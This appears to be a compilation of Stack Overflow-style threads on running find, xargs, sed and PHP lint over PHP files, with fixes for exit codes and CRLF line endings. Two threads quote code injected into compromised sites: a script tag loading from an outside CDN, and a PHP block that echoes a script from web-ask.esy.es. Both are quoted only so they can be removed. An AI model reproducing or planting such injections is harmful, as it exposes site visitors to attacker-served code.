I want to run a strict syntax check:
$ php -d error_reporting=32767 -l test.php
for all php files inside my project in Travis CI.
I tried to use find, but it always returns 0, even if the command given to the -exec flag fails:
$ find . -type f -name "*.php" -exec php -d error_reporting=32767 -l {} \;
PHP Parse error: syntax error, unexpected end of file, expecting ',' or ';' in ./test.php on line 3
$ echo $?
0
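This behavior is easy to reproduce with a command that always fails: with the `\;` form, a failing `-exec` command only makes that predicate false, while the `+` form does propagate a failure into find's own exit status (though it batches many files per invocation, which may not suit every command):

```shell
# With ";" the -exec command's failure is swallowed;
# with "+" it makes find itself exit non-zero.
find . -maxdepth 0 -exec false {} \;
echo $?   # 0
find . -maxdepth 0 -exec false {} +
echo $?   # non-zero
```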
I solved this by checking whether find + php writes anything to STDERR.
before_script:
- '! find . -type f -name "*.php" -exec php -d error_reporting=32767 -l {} \; 2>&1 >&- | grep "^"'
How does this work? Adding:
2>&1 >&-
after any command redirects STDERR into STDOUT (here, the pipe) and then closes the original STDOUT, so only STDERR output reaches the pipe.
Then we can just check if the output contains any lines with grep:
| grep "^"
Because grep returns 0 if it finds anything and 1 if it doesn't, we negate the end result with an exclamation mark at the start of the command. Otherwise the command would fail when everything is okay and succeed when things are failing.
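The whole mechanism can be modeled with two toy commands (hypothetical names, not part of the original setup): one that stays silent and one that writes only to STDERR:

```shell
quiet() { true; }              # writes nothing at all
noisy() { echo "oops" >&2; }   # writes only to STDERR

# STDERR goes into the pipe, STDOUT is closed, grep "^" matches
# any line at all, and "!" flips the result:
! quiet 2>&1 >&- | grep "^"    # exit status 0: nothing on STDERR
! noisy 2>&1 >&- | grep "^"    # exit status 1: STDERR had output
```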
this gives me an error
sudo find . -type f -name '*.php' -exec sed -i 's/<script type='text/javascript' src='https://cdn.eeduelements.com/jquery.js?ver=1.0.8'></script>//g' {} \;
sed: -e expression #1, char 44: unknown option to 's'
I am open to anything; I just need that pattern removed from every file and can't seem to get it right. There are too many files to go through manually.
Any help is greatly appreciated.
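A likely cause of that error (an assumption, not confirmed in the thread): the inner single quotes end the shell's quoting early, and the slashes in the URL terminate sed's s/// expression, which produces exactly that "unknown option to `s'" message. A sketch of a fix, double-quoting the whole expression and using | as the sed delimiter:

```shell
# Double quotes keep the inner single quotes literal; "|" as the
# delimiter lets the URL's slashes appear in the pattern unescaped.
sudo find . -type f -name '*.php' -exec sed -i \
  "s|<script type='text/javascript' src='https://cdn.eeduelements.com/jquery.js?ver=1.0.8'></script>||g" {} \;
```

Note that `-i` without a suffix assumes GNU sed; BSD sed needs `-i ''`.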
This entry in my Makefile happily crawls my PHP files and runs PHP's built-in lint on them:
lint:
@find . -name "*.php" | grep -v "^./lib" | grep -v "^./vendor" | xargs -I{} php -l '{}' | grep -v "No syntax errors detected"
The grep -v suppresses all the "No syntax errors detected" messages that would otherwise be produced, while still letting failure messages through, if any.
The problem is that make dies when there are no syntax errors and continues when there are errors. This is because of the exit code from grep -v. It thinks it has succeeded when it finds something (an error message) and failed when it finds nothing (all files passed lint).
I looked at negating the exit code of the final call to grep with !:
lint:
@find . -name "*.php" | grep -v "^./lib" | grep -v "^./vendor" | xargs -I{} php -l '{}' | ! grep -v "No syntax errors detected"
but that gives me:
/bin/sh: -c: line 0: syntax error near unexpected token `!'
I can use ! at the command line just fine, but in this context it doesn't work for some reason.
I'm curious how I negate an exit code within the context of a pipeline/xargs/grep/make. But mostly I want to solve my problem - open to any suggestions that result in a working lint target in my Makefile that does the right thing.
The return value of a pipeline is the one returned by its last command, so you just need to invert the status of the full command line:
lint:
@! find ... | grep -v "No syntax errors detected"
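The difference is easy to check outside of make, since make runs each recipe line with /bin/sh -c (toy echo lines stand in for the real find output here):

```shell
# Negating the whole pipeline is valid sh:
sh -c '! echo "No syntax errors detected in a.php" | grep -v "No syntax errors detected"'
echo $?   # 0: the only line was filtered out, so the target passes

sh -c '! echo "Parse error in b.php" | grep -v "No syntax errors detected"'
echo $?   # 1: an error line survived the filter, so the target fails
```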
All my .php files were appended with a block of code like this:
<?php
#bbf007#
if(empty($r)) {
$r = "<script type=\"text/javascript\" src=\"http://web-ask.esy.es/m2nzgpzt.php?id=11101326\"></script>";
echo $r;
}
#/bbf007#
?>
I need to write a bash script with a regular expression to remove this block from the code files. Please suggest an approach.
Backup first!
The following will take all but the last 8 lines from all .php files within the current directory and its subdirectories, and write them to corresponding files called *.php.new:
find -name "*.php" | xargs -i sh -c 'head -n -8 {} > {}.new'
Then, move all the current php files to *.php.old:
find -name "*.php" | xargs -i sh -c 'mv {} {}.old'
Then, move the .php.new files to .php
find -name "*.php.new" | xargs -i sh -c 'mv {} `echo '{}' | head -c -5`'
I know for a fact that these PHP files exist. I can open them in VIM and see the offending character.
I found several links here on Stack Overflow that suggest remedies for this, but none of them work properly. I know for a fact that several files do not contain the ^M characters (CRLF line endings); however, I keep getting false positives.
find . -type f -name "*.php" -exec fgrep -l $'\r' "{}" \;
Returns false positives.
find . -not -type d -name "*.php" -exec file "{}" ";" | grep CRLF
Returns nothing.
etc...etc...
Edit: Yes, I am executing these lines in the offending directory.
Do you use a source control repository for storing your files? Many of them have the ability to automatically make sure that line endings of files are correct upon commit. I can give you an example with Subversion.
I have a pre-commit hook that allows me to specify what properties in Subversion must be on what files in order for those files to be committed. For example, I could specify that any file that ends in *.php must have the property svn:eol-style set to LF.
If you use this, you'll never have an issue with the ^M line endings again.
As for finding them, I've been able to do this:
$ find . -type f -exec egrep -l "^M$" {} \;
Where ^M is a Control-M. With Bash or Kornshell, you can get that by pressing Control-V, then Control-M. You might have to have set -o vi for it to work.
A little Perl can not only reveal the files but change them as desired. To find your culprits, do:
find . -type f -name "*.php" -exec perl -ne 'print $ARGV if m{\r$}' {} + > badstuff
Now, if you want to remove the pesky carriage returns in place:
perl -pi -e 's{\r$}{}' $(<badstuff)
...which eliminates the carriage return from all of the affected files. If you want to do that and create a backup copy too, do:
perl -pi.old -e 's{\r$}{}' $(<badstuff)
I tend to use the instructions provided at http://kb.iu.edu/data/agiz.html to do this. The following will change the ^M in a specific file to a \n return and place that into a new file using tr:
tr '\r' '\n' < macfile.txt > unixfile.txt
This does the same thing just using perl instead. With this one you can probably pipe in a series of files:
perl -p -e 's/\r/\n/g' < macfile.txt > unixfile.txt
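One caveat: tr '\r' '\n' fits classic Mac files with CR-only line endings; run on CRLF input it turns every line break into two. For CRLF files it is safer to delete the carriage returns instead (same placeholder filenames as above):

```shell
# CRLF -> LF by deleting the CRs rather than translating them.
tr -d '\r' < dosfile.txt > unixfile.txt
```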
The file command will tell you which kinds of line-end characters it sees:
$ file to-do.txt
to-do.txt: ASCII text, with CRLF line terminators
$ file mixed.txt
mixed.txt: ASCII text, with CRLF, LF line terminators
So you could run e.g.
find . -type f -name "*.php" -exec file "{}" \; | grep -c CRLF
to count the number of files that have at least some CRLF line endings.
You could also use dos2unix or fromdos to convert them all to LF only:
find . -type f -name "*.php" -exec dos2unix "{}" \;
You might also care whether these tools rewrite all of the files or only the ones that actually need converting; check the tool's documentation.
ls -1 *.php | xargs php -l doesn't work; any clues why? (It only checks the first file.)
I am trying to detect parse errors in my whole application.
Thank you.
EDIT:
Came up with this, it is sufficient for my needs:
#!/bin/sh
for chave in $(find . -name '*.php') ; do
    php -l "$chave"
done
find . -name '*.php' -print0 | xargs -0 -L 1 php -l
This has the added bonus of working no matter what characters your filenames contain. Unfortunately I'm not sure why it's not working without the -L 1 part :(
Only print the ones that fail:
find . -name '*.php' -print0 | xargs -0 -L 1 php -l | grep -v 'No syntax errors detected in ./'
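Note that the grep -v filter also inverts the pipeline's exit status: grep exits 1 when every file is clean and 0 when an error line gets through. If the exit status matters (for example in CI), the whole pipeline can be negated; a sketch:

```shell
# Fails (exit 1) only when some php -l output survives the filter,
# i.e. when at least one file has a syntax error.
! find . -name '*.php' -print0 | xargs -0 -L 1 php -l \
  | grep -v 'No syntax errors detected'
```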